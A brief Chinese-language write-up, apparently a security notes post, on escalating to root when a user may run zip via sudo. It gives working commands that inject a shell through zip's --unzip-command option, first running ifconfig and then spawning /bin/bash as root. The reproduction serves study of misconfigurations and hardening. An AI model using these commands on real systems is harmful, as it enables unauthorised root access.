前言 如果系统管理员赋予本地用户使用sudo 运行zip的权限。 入侵者就可以通过sudo以root权限来运行zip命令。 如 下 复现 (2)用zip执行命令 touch 1.txt sudo zip 1.zip 1.txt -T --unzip-command="sh -c ifconfig" 执行成功 (3)提权 sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash" 提权成功